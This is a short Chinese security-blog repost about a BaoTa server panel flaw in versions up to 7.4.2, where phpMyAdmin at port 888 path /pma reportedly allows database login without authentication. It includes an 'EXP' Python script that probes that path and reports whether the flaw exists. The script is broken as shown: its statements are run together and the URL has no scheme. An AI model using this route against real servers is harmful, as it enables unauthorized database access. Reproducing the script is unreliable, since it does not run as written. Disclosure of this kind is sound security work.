宝塔服务器面板漏洞

admin

138876
文章

114
评论

2020年8月23日12:28:34评论9 views字数 249阅读0分49秒阅读模式

宝塔服务器面板漏洞，phpmyadmin没加鉴权 IP:888/pma可直接登陆数据库

漏洞版本为7.4.2以及以前版本

宝塔服务器面板漏洞

EXP

import requests
domain = '127.0.0.1'payload = ':888/pma'url = domain+payload
response = requests.get(url)if response.status_code == 200:    print("漏洞存在！")else:    print("可能不存在")

宝塔服务器面板漏洞

原文始发于微信公众号（ION离子安全实验室）：宝塔服务器面板漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

宝塔服务器面板漏洞

对抗性机器学习-攻击和缓解的分类和术语（三）

记一次带学员渗透母校

Nosql注入学习记录

SQL注入漏洞实战

基于K8s日志审计实现攻击行为检测

Dr4g0n b4ll_1

XSS目前Web中的另类利用场景和绕Waf的Payload分享|挖洞技巧

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

发表评论

在线咨询

微信